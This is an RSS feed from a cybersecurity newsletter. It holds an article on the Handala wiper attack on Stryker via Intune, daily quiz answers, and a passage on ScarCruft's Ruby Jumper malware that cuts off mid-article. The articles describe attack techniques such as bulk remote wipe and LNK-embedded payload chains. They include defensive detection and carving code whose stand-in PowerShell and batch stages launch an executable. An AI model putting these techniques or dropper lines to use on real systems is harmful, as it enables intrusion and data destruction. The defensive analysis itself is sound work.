<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Cyber++]]></title><description><![CDATA[Everything about the current cyber-security landscape. ]]></description><link>https://emilianocybersec.substack.com</link><image><url>https://substackcdn.com/image/fetch/$s_!NHpj!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8818be53-21cf-4df5-983d-13d9ffd975df_1280x1280.png</url><title>Cyber++</title><link>https://emilianocybersec.substack.com</link></image><generator>Substack</generator><lastBuildDate>Mon, 15 Jun 2026 12:30:06 GMT</lastBuildDate><atom:link href="https://emilianocybersec.substack.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Emiliano L. Compassi]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[emilianocybersec@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[emilianocybersec@substack.com]]></itunes:email><itunes:name><![CDATA[Emiliano L. Compassi]]></itunes:name></itunes:owner><itunes:author><![CDATA[Emiliano L. Compassi]]></itunes:author><googleplay:owner><![CDATA[emilianocybersec@substack.com]]></googleplay:owner><googleplay:email><![CDATA[emilianocybersec@substack.com]]></googleplay:email><googleplay:author><![CDATA[Emiliano L. Compassi]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[Handala Wiped 200,000 Stryker Devices. They Didn't Need Malware. 
]]></title><description><![CDATA[Everything about the current cyber-security landscape.]]></description><link>https://emilianocybersec.substack.com/p/handala-wiped-200000-stryker-devices</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/handala-wiped-200000-stryker-devices</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Fri, 13 Mar 2026 17:04:37 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/370ca632-9e3f-465f-ae79-a55c4b0e1989_1960x1308.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>On March 11, 2026, employees at Stryker offices worldwide came in to find their devices wiped. More than 5,000 workers at the company&#8217;s largest non-US hub in Cork, Ireland were sent home. The voicemail at Stryker&#8217;s Michigan headquarters told callers the company was experiencing a building emergency.</p><p>Stryker makes surgical instruments, orthopedic implants, robotic surgery systems, and hospital equipment used by around 150 million patients a year across 61 countries. It reported $25 billion in revenue last year. This was not a small target hit by accident.</p><p>The group claiming responsibility is Handala, assessed by Palo Alto Networks as a front for Void Manticore, a threat actor affiliated with Iran&#8217;s Ministry of Intelligence and Security. They said the attack was retaliation for a US missile strike on a girls&#8217; school in Minab, Iran, that killed more than 175 people, most of them children.</p><h2><strong>The attack vector</strong></h2><p>Stryker&#8217;s statement said there was no ransomware or malware and the incident was contained to its Microsoft environment. That is a careful choice of words. 
Wiper attacks carried out through a legitimate management platform do not involve malware in the traditional sense, but they are still destructive attacks; the wipe simply runs on the vendor&#8217;s code instead of the attacker&#8217;s.</p><p>Rafe Pilling, Director of Threat Intelligence at Sophos, <a href="https://www.nbcnews.com/world/iran/iran-appears-conducted-significant-cyberattack-us-company-first-war-st-rcna263084">assessed that Handala likely obtained access to Stryker&#8217;s Microsoft Intune console</a>, the MDM platform Stryker uses to manage its global device fleet. Intune has a remote wipe feature built in for lost or stolen devices. Handala appears to have triggered it at scale across enrolled endpoints.</p><p>If that holds, the attackers did not need a custom implant or an exploit chain. They needed credentials to the right console. Everything after that was a built-in feature doing what it was designed to do.</p><h2><strong>Why a wiper is worse than ransomware</strong></h2><p>With ransomware, there is at least a negotiation. Files are encrypted, not gone, and organisations with working backups can often recover without paying. A wiper has no such dynamic: the data is destroyed and there is nothing to negotiate over. The disruption is the point.</p><p>Handala also claimed to have exfiltrated 50 terabytes of data before triggering the wipe. If true, the data was collected first and destroyed after, which means Stryker&#8217;s recovery does not undo the breach; it only addresses the operational damage.</p><p>The patient-facing impact was real. <a href="https://www.cnn.com/2026/03/11/politics/pro-iran-hackers-cyberattack-medical-device-maker">Maryland&#8217;s Institute for Emergency Medical Services reported Stryker&#8217;s Lifenet ECG transmission system was non-functional across most of the state</a>, pushing paramedics back to verbal radio reports. HHS opened an investigation. 
Hospitals started evaluating whether to disconnect Stryker equipment from their networks.</p><h2><strong>The management plane problem</strong></h2><p>MDM platforms like Intune exist to give IT teams centralised control over every enrolled device in an organisation: push updates, enforce policies, remotely wipe hardware reported lost or stolen. At scale, that means one admin account with the right permissions can affect every endpoint on the tenant simultaneously, with no lateral movement required. The blast radius is set by the role, not by the network: whoever holds a role that can issue wipe or retire actions against all devices holds the same power, whether they are a helpdesk engineer or an attacker with their token.</p><p>This is not a new attack surface. MDM abuse has come up before in enterprise intrusions. But Stryker is the clearest large-scale example of what it looks like when it is weaponised deliberately, at a global company, during an active geopolitical conflict. The same tooling that makes fleet management efficient is what made 200,000 devices erasable in a single operation.</p><h2><strong>Who is Handala</strong></h2><p>Handala emerged in late 2023 targeting Israeli organisations and has been active throughout the Gaza conflict. <a href="https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/">Palo Alto Networks links it to Void Manticore, a MOIS-affiliated actor</a>, with a history of phishing, data theft, wiper attacks, and psychological operations including officer doxxing and fabricated leak narratives.</p><p>The group routinely overstates the scale of its operations, so the 200,000-device figure and the 50 TB exfil claim should be treated with some scepticism until independently verified. What is confirmed is that Stryker systems in multiple countries were wiped and showing Handala&#8217;s logo; the Wall Street Journal and NBC News both corroborated that much.</p><p>Handala also claimed a simultaneous attack on Verifone the same day. Verifone denied any disruption. 
Worth noting, but the Stryker operation is the one with visible impact.</p><h2><strong>Context</strong></h2><p>The US-Israel military campaign against Iran began on February 28, 2026. In the weeks following, Iranian-linked groups were mostly quiet on US targets; <a href="https://www.cnn.com/2026/03/11/politics/pro-iran-hackers-cyberattack-medical-device-maker">Proofpoint tracked only one attempted intrusion, against a US think tank, in that entire period</a>. The Stryker attack is the first significant destructive operation against a US company since the conflict began.</p><p>The IRGC this week named US and Israeli-linked banks and economic infrastructure as legitimate targets. <a href="https://www.aljazeera.com/news/2026/3/11/iran-linked-hackers-hit-medical-giant-stryker-in-retaliatory-cyberattack">State-affiliated Iranian media published a list of US tech firms (Google, Microsoft, Nvidia) framing their regional infrastructure as targets</a>. Those are statements of intent, not confirmed operations. 
But the Stryker attack shows the capability is there.</p><h2><strong>Technical summary</strong></h2><ul><li><p><strong>Actor:</strong> Handala (Void Manticore persona, MOIS-affiliated)</p></li><li><p><strong>Target:</strong> Stryker Corporation (NYSE: SYK), Kalamazoo, Michigan</p></li><li><p><strong>Date:</strong> March 11, 2026</p></li><li><p><strong>Attack type:</strong> Destructive wipe, not ransomware</p></li><li><p><strong>Claimed scope:</strong> 200,000+ systems, servers and mobile devices across 79 countries</p></li><li><p><strong>Claimed exfil:</strong> 50 TB</p></li><li><p><strong>Suspected vector:</strong> Microsoft Intune MDM console (privileged credential access)</p></li><li><p><strong>No custom malware:</strong> Remote wipe issued via native platform functionality</p></li><li><p><strong>Patient impact:</strong> Lifenet ECG system down in Maryland; HHS investigating</p></li><li><p><strong>Motive:</strong> Retaliation for Minab school missile strike (175+ killed)</p></li></ul><h2><strong>What this tells us</strong></h2><p>If the Intune vector is confirmed, this attack did not require much: stolen credentials, access to the right console, and a feature that ships with the product. Stryker is a $25 billion company with a global security team, and it still ended up with 5,000 people sent home and ECG systems down across Maryland. That gap between the effort required and the damage done is what makes this worth paying attention to beyond the Iran angle.</p><p>Every organisation running Microsoft 365 at scale has the same exposure. 
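</p><p>What that exposure looks like in the audit trail is worth making concrete. The following is an added example, not code from the article or from Microsoft: a small detector that replays Intune-style audit events and raises an alert when one actor issues more wipe or retire actions inside a ten-minute window than a helpdesk ever would. The event shape loosely follows the Graph <code>deviceManagement/auditEvents</code> resource, and the events, the activity-type keywords, the window and the threshold are all constructed assumptions.</p>

```python
"""Flag bursts of remote-wipe activity in Intune-style audit events.

Added example, not from the article. The event shape loosely follows the
Microsoft Graph deviceManagement/auditEvents resource (activityDateTime,
activityType, actor.userPrincipalName, resources[].displayName). The
sample events, the activity-type keywords and the window/threshold values
are constructed assumptions to tune against your own tenant's baseline.
"""
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)       # assumption: per-actor look-back window
THRESHOLD = 5                        # assumption: destructive actions in WINDOW that warrant an alert
DESTRUCTIVE = ("wipe", "retire")     # assumption: substrings of destructive activityType values


def is_destructive(event: dict) -> bool:
    kind = event.get("activityType", "").lower()
    return any(word in kind for word in DESTRUCTIVE)


def parse_ts(value: str) -> datetime:
    """Graph timestamps are ISO 8601 with a trailing Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def actor_of(event: dict) -> str:
    actor = event.get("actor", {})
    return actor.get("userPrincipalName") or actor.get("applicationDisplayName") or "unknown"


def find_wipe_bursts(events, window: timedelta = WINDOW, threshold: int = THRESHOLD) -> list[dict]:
    """Return one alert per actor whose destructive actions reach `threshold` within `window`.

    A deque per actor holds the events inside the sliding window; the alert is
    refreshed on every further event so the final count and device list are complete.
    """
    recent: dict[str, deque] = defaultdict(deque)
    alerts: dict[str, dict] = {}
    for ev in sorted(events, key=lambda e: e["activityDateTime"]):
        if not is_destructive(ev):
            continue
        actor, ts = actor_of(ev), parse_ts(ev["activityDateTime"])
        window_events = recent[actor]
        window_events.append((ts, ev))
        while ts - window_events[0][0] > window:      # drop events that aged out of the window
            window_events.popleft()
        if len(window_events) >= threshold:
            devices = sorted({r.get("displayName", "?")
                              for _, e in window_events for r in e.get("resources", [])})
            alerts[actor] = {
                "actor": actor,
                "count": len(window_events),
                "first": window_events[0][0].isoformat(),
                "last": ts.isoformat(),
                "devices": devices,
            }
    return list(alerts.values())


# -- constructed sample data -------------------------------------------------
def _event(ts: str, actor: str, activity: str, device: str | None = None) -> dict:
    return {
        "activityDateTime": ts,
        "activityType": activity,
        "actor": {"userPrincipalName": actor},
        "resources": [{"displayName": device}] if device else [],
    }


def sample_events() -> list[dict]:
    """A helpdesk admin doing routine wipes, then one account wiping eight devices in seven minutes."""
    routine = [
        _event("2026-03-10T09:12:00Z", "helpdesk@corp.example", "Wipe ManagedDevice", "LAPTOP-0412"),
        _event("2026-03-10T11:40:00Z", "helpdesk@corp.example", "Patch DeviceConfiguration"),
        _event("2026-03-10T15:03:00Z", "helpdesk@corp.example", "Wipe ManagedDevice", "LAPTOP-0977"),
    ]
    burst = [
        _event(f"2026-03-11T02:{minute:02d}:00Z", "svc-mdm@corp.example",
               "Wipe ManagedDevice", f"WS-{1000 + minute}")
        for minute in range(8)
    ]
    return routine + burst


if __name__ == "__main__":
    for alert in find_wipe_bursts(sample_events()):
        print(f"{alert['actor']}: {alert['count']} destructive actions "
              f"between {alert['first']} and {alert['last']}")
        print("  devices:", ", ".join(alert["devices"]))
```

<p>Against the sample, the helpdesk account&#8217;s two wipes hours apart stay quiet while the eight-in-seven-minutes burst from <code>svc-mdm@corp.example</code> is reported with its device list. In production the same logic belongs in the SIEM as a scheduled query over the audit log, with the threshold set from a baseline of normal wipe volume rather than the guess used here. </p><p>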
The Intune console is typically protected like any other admin interface, but the consequences of losing it are closer to losing your entire endpoint fleet than losing a single server. Most security programmes have not caught up to that reality. The practical response is to treat the roles that can wipe or retire devices as tier-0 assets: scope them to a dedicated Intune role rather than a tenant-wide admin, require phishing-resistant MFA and just-in-time activation for them, and alert on any bulk use of those actions.</p><p>Stryker will recover operationally. Devices get re-enrolled, systems get rebuilt. But 50 TB of data, if it was actually taken, is not coming back. Whatever was in there is now with whoever Handala answers to. That part of the incident does not have a remediation plan.</p><div><hr></div><p><strong>Sources</strong></p><ol><li><p><a href="https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/">Krebs on Security: Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker</a></p></li><li><p><a href="https://www.nbcnews.com/world/iran/iran-appears-conducted-significant-cyberattack-us-company-first-war-st-rcna263084">NBC News: Iran appears to have conducted a significant cyberattack against a US company</a></p></li><li><p><a href="https://techcrunch.com/2026/03/11/stryker-hack-pro-iran-hacktivist-group-handala-says-it-is-behind-attack/">TechCrunch: Pro-Iran hacktivist group says it is behind attack on medical tech 
giant Stryker</a></p></li><li><p><a href="https://www.securityweek.com/medtech-giant-stryker-crippled-by-iran-linked-hacker-attack/">SecurityWeek: MedTech Giant Stryker Crippled by Iran-Linked Hacker Attack</a></p></li><li><p><a href="https://www.itsecurityguru.org/2026/03/13/iran-linked-hacktivists-claim-destructive-cyberattack-on-medtech-firm-stryker/">IT Security Guru: Iran-Linked Hacktivists Claim Destructive Cyberattack on Medtech Firm Stryker</a></p></li><li><p><a href="https://www.cnn.com/2026/03/11/politics/pro-iran-hackers-cyberattack-medical-device-maker">CNN: Pro-Iran hackers claim cyberattack on major US medical device maker</a></p></li><li><p><a href="https://www.aljazeera.com/news/2026/3/11/iran-linked-hackers-hit-medical-giant-stryker-in-retaliatory-cyberattack">Al Jazeera: Iran-linked hackers hit medical giant Stryker in retaliatory cyberattack</a></p></li><li><p><a href="https://time.com/article/2026/03/12/iran-linked-cyberattack-us-company-stryker/">TIME: Iran-Linked Hackers Claim Cyberattack on U.S. Company</a></p></li></ol>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answers revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-411</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-411</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Tue, 10 Mar 2026 09:31:05 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/34276c16-dc4d-4d20-bd74-98da64190eaf_1928x1340.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:470270}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: DDoS (Distributed Denial of Service)</p><p>A DDoS attack overwhelms a server with traffic sent from many sources at once, typically a botnet, so that legitimate requests cannot be served.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answers revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-d01</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-d01</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Mon, 09 Mar 2026 08:32:25 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/774e710e-0add-424f-985c-664b4231ef14_1928x1340.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:470266}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: SLA (Service Level Agreement)</p><p>A formal contract between a service provider and a customer that defines the expected level of service, including specific metrics for uptime, performance targets, and penalties for non-compliance.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-0e7</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-0e7</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Sat, 07 Mar 2026 18:12:49 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/186a7092-9f26-4952-abf9-048e780b195f_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:469452}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: Sender&#8217;s public key</p><ul><li><p>The sender signs with their <strong>private key</strong> (which only they know).</p></li><li><p>Anyone can verify that signature using the sender&#8217;s <strong>public key</strong> (which everyone can see), which proves the message came from the holder of the private key and was not altered afterwards.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-0db</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-0db</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Fri, 06 Mar 2026 14:02:53 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/2b61b488-c955-46fa-b927-30917b877cd1_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:463473}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: <strong>Data protection</strong>.</p><p>GDPR stands for <strong>General Data Protection Regulation</strong>. It is a comprehensive legal framework enacted by the European Union (EU) that governs how the personal data of individuals is collected, processed, and stored.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-16c</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-16c</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Thu, 05 Mar 2026 14:02:57 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/49d5dbd5-80fe-4964-a0b1-ed0365cf10c2_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:463467}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: <strong>Filter</strong></p><p>A firewall primarily acts as a&nbsp;<strong>filter</strong>&nbsp;for network traffic, monitoring and controlling the flow of data according to a set of predetermined security rules.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-187</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-187</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Wed, 04 Mar 2026 14:01:59 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f4ba4d69-2084-45c0-b99c-a6daaa8299ee_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:463464}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: <strong>Rainbow table attack</strong>.</p><p>A rainbow table attack uses <strong>precomputed tables</strong> of hash values to quickly recover plaintext passwords from their hashed counterparts. A unique per-password salt defeats it, because a table would have to be built for every salt.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-c9a</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-c9a</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Tue, 03 Mar 2026 14:03:03 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/b49dd5fc-4bfa-4d62-8f68-ca5397784947_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:463462}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: Hashing.</p><p>Hashing checks data integrity <strong>by comparing a newly calculated hash of a file or message against a trusted "original" hash</strong>. The comparison only means something if the reference hash came through a channel the attacker cannot also modify, such as a signed manifest rather than the same download page as the file.</p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-261</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-261</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Mon, 02 Mar 2026 14:03:03 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/88c6c944-4e3b-437a-88b6-76d7f9da3ff6_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453843}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s answer: Illicit Consent Grant</p><ul><li><p>An illicit consent grant involves an attacker registering an application in Azure AD (now Microsoft Entra ID) and tricking users into granting it permissions to access their data. 
This grants the attacker persistent access to the organization&#8217;s data without needing to compromise user credentials, and the access survives password resets until the consent itself is revoked.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Ruby Jumper: How North Korea's ScarCruft Is Bridging the Air Gap]]></title><description><![CDATA[ScarCruft's latest campaign deploys six malware families, abuses Zoho WorkDrive as a covert C2 channel, and weaponises USB drives to reach systems that were never supposed to touch the internet.]]></description><link>https://emilianocybersec.substack.com/p/ruby-jumper-how-north-koreas-scarcruft</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/ruby-jumper-how-north-koreas-scarcruft</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Sun, 01 Mar 2026 21:17:15 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/bfa21ee3-8468-4abe-ac2c-fb3a11786db3_2506x1274.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Air-gapped networks are not supposed to be reachable from the open internet. That is their entire purpose: physical separation from any network an attacker might use to deliver malware, exfiltrate data, or issue commands. For the most sensitive systems in government, defence, and critical infrastructure, the air gap is the last line of defence when everything else fails.</p><p>ScarCruft, the North Korean state-sponsored threat actor also tracked as APT37, has spent years trying to cross that line. 
Their latest campaign, codenamed Ruby Jumper by Zscaler ThreatLabz, which discovered it in December 2025, represents their most sophisticated attempt yet. It deploys six distinct malware families in a coordinated infection chain, abuses legitimate cloud storage services as covert command-and-control infrastructure, and uses infected USB drives as a physical data relay to bridge the gap between internet-connected machines and isolated networks.</p><p>This is not a theoretical concern. Ruby Jumper appears to have been in active development and deployment for some time, and the tooling it brings to bear is mature, modular, and clearly purpose-built for long-term surveillance of high-value targets.</p><h2><strong>Who Is ScarCruft?</strong></h2><p>ScarCruft is a North Korean advanced persistent threat group with a long track record of targeting South Korean government entities, diplomatic organisations, military contractors, and journalists covering North Korean affairs. The group has been active since at least 2012 and is widely believed to operate under the direction of North Korea&#8217;s Reconnaissance General Bureau.</p><p>Their previous campaigns have demonstrated a consistent interest in long-term surveillance rather than destructive attacks. ScarCruft is a collection operation that requires persistent, quiet access to targets and the ability to exfiltrate intelligence without triggering alarms. That operational philosophy is evident throughout the Ruby Jumper toolset.</p><p>The group has a history of abusing legitimate cloud infrastructure for C2. BLUELIGHT, one of their older backdoors, has been active since at least 2021 and has previously been observed using Google Drive, Microsoft OneDrive, pCloud, and BackBlaze to receive commands and upload stolen data. By routing malicious traffic through services that organisations trust and whitelist, ScarCruft makes network-layer detection significantly harder. 
Ruby Jumper extends this approach by adding Zoho WorkDrive to the roster, the first time the group has been observed abusing that platform.</p><h2><strong>The Infection Chain: Six Malware Families in One Campaign</strong></h2><p>Ruby Jumper is not a single piece of malware. It is a coordinated infection chain with distinct stages, each handled by a different implant. The modular design means that losing one component does not necessarily compromise the entire operation, and it complicates attribution and defensive response.</p><p>The chain begins with a malicious LNK file, a Windows shortcut, used as the initial delivery mechanism. When a victim opens the file, it executes a PowerShell command that scans the current directory to locate itself based on file size: the PowerShell a shortcut launches is not told where the shortcut lives, and an LNK carrying several payloads is far larger than any normal shortcut, so the size acts as a fingerprint. This self-referential technique allows the malware to carve multiple embedded payloads from fixed offsets within the LNK file itself, without writing obvious dropper binaries to disk first.</p><p>From that single LNK, the following are extracted and executed in sequence: a decoy document, a Windows executable payload, an additional PowerShell script, and a batch file. In at least one observed instance the decoy document deserves particular attention: it displays an Arabic-language translation of an article from a North Korean newspaper about the Palestine-Israel conflict. 
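</p><p>Pulling those four pieces back out of the shortcut is the first thing an analyst does with a sample like this. The following is an added example, not code from the article or from Zscaler ThreatLabz: it builds a constructed LNK (a real ShellLinkHeader followed by padding and four stand-in payloads), mirrors the dropper&#8217;s size-based self-location, carves the payloads using an offset table of the kind recovered from the PowerShell one-liner, and falls back to scanning for file signatures when no table is known. The offsets, the size threshold and the payloads being stored unencoded are assumptions made for the sample, not the real campaign&#8217;s layout.</p>

```python
"""Triage an oversized LNK and carve the payloads it embeds at fixed offsets.

Added example, not code from the article or from Zscaler ThreatLabz. The
shortcut below is constructed: a valid 76-byte ShellLinkHeader followed by
padding and four stand-in payloads (decoy, executable, PowerShell script,
batch file) at offsets chosen here. In practice the offset table is
recovered from the dropper's own PowerShell one-liner; the layout, the size
threshold and the payloads being stored in the clear are all assumptions.
"""
from __future__ import annotations

from pathlib import Path

# ShellLinkHeader: HeaderSize 0x4C then LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
SUSPICIOUS_SIZE = 1024 * 1024        # assumption: a shortcut over 1 MiB deserves a look
SIGNATURES = {b"MZ": "pe", b"PK\x03\x04": "zip/office", b"%PDF": "pdf"}


def is_lnk(data: bytes) -> bool:
    return data[:len(LNK_MAGIC)] == LNK_MAGIC


def is_oversized(data: bytes, limit: int = SUSPICIOUS_SIZE) -> bool:
    return len(data) > limit


def find_self_by_size(directory: Path, size: int) -> list[Path]:
    """Mimic the dropper's self-location: which files in the directory have exactly this size?"""
    return sorted(p for p in directory.iterdir() if p.is_file() and p.stat().st_size == size)


def carve(data: bytes, table: dict[str, tuple[int, int]]) -> dict[str, bytes]:
    """Slice each payload out by (offset, length); refuse entries that run past the end."""
    parts = {}
    for name, (offset, length) in table.items():
        if offset + length > len(data):
            raise ValueError(f"{name}: {offset}+{length} exceeds file size {len(data)}")
        parts[name] = data[offset:offset + length]
    return parts


def scan_signatures(data: bytes, start: int = HEADER_SIZE) -> list[tuple[int, str]]:
    """Fallback when no offset table is known: locate embedded file headers after the LNK header."""
    hits = []
    for magic, kind in SIGNATURES.items():
        pos = data.find(magic, start)
        while pos != -1:
            hits.append((pos, kind))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


# -- constructed sample --------------------------------------------------------
DECOY = b"PK\x03\x04" + b"\x00" * 60                          # stand-in for a .docx (ZIP container)
EXE = b"MZ" + b"\x90" * 70                                     # stand-in for the PE payload
PS1 = b"Start-Process -FilePath \"$env:TEMP\\a.exe\"\r\n"      # stand-in PowerShell stage
BAT = b"@echo off\r\nstart \"\" \"%TEMP%\\a.exe\"\r\n"         # stand-in batch stage


def build_sample_lnk() -> tuple[bytes, dict[str, tuple[int, int]]]:
    """Assemble header + junk body + payloads; return the blob and its offset table."""
    body = bytearray(LNK_MAGIC + b"\x00" * (HEADER_SIZE - len(LNK_MAGIC)) + b"\x00" * 0x200)
    table: dict[str, tuple[int, int]] = {}
    for name, blob in (("decoy", DECOY), ("exe", EXE), ("ps1", PS1), ("bat", BAT)):
        table[name] = (len(body), len(blob))
        body += blob + b"\x00" * 16                            # 16 bytes of padding between payloads
    return bytes(body), table


if __name__ == "__main__":
    blob, table = build_sample_lnk()
    print("LNK header:", is_lnk(blob), "| oversized:", is_oversized(blob))
    for name, payload in carve(blob, table).items():
        print(f"{name:5s} @ {table[name][0]:#06x} {len(payload):4d} bytes  {payload[:8]!r}")
    print("signature hits:", scan_signatures(blob))
```

<p>The signature scan is the useful generalisation: droppers often encode or XOR their embedded payloads, so if <code>scan_signatures</code> finds nothing in an oversized LNK, the next step is to lift the decoding routine out of the PowerShell and apply it before carving. </p><p>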
This is a classic ScarCruft lure pattern: the document is plausible, topically relevant to a Middle Eastern or diplomatic audience, and designed to keep the victim occupied while the malicious chain executes in the background.</p><blockquote><p><em>&#8220;Most critically, THUMBSBD and VIRUSTASK weaponise removable media to bypass network isolation and infect air-gapped systems.&#8221;</em></p><p><em>Zscaler ThreatLabz researcher Seongsu Park</em></p></blockquote><p><strong>Stage One: RESTLEAF and the Zoho WorkDrive C2</strong></p><p>The first executable payload to be deployed is RESTLEAF, a Windows implant that is spawned directly in memory and never written to disk as a standalone executable, helping it evade file-based detection. RESTLEAF&#8217;s primary function is to establish C2 communications, and it does so using Zoho WorkDrive.</p><p>The authentication mechanism is straightforward: RESTLEAF carries a hardcoded Zoho WorkDrive access token. Once authenticated, it polls the WorkDrive for shellcode payloads, downloads them, and executes them via <em>process injection</em>, injecting the shellcode into a legitimate running process to further reduce its forensic footprint. This marks the first documented instance of ScarCruft abusing Zoho WorkDrive infrastructure. The choice is deliberate: Zoho WorkDrive is a legitimate, widely used enterprise cloud storage service, and HTTPS traffic to its domains will blend into normal corporate network activity with minimal chance of triggering alerts. The hardcoded token cuts both ways, though: once recovered from a sample it identifies the operator&#8217;s WorkDrive account, which the provider can revoke.</p><p><strong>Stage Two: SNAKEDROPPER and the Ruby Runtime</strong></p><p>The shellcode delivered by RESTLEAF loads SNAKEDROPPER, which handles the campaign&#8217;s most unusual infrastructure decision: it installs a complete, self-contained Ruby runtime on the victim machine.</p><p>Why Ruby? The choice appears deliberate, an act of obfuscation through obscurity. The subsequent malware components, THUMBSBD and VIRUSTASK, are deployed as disguised Ruby files. 
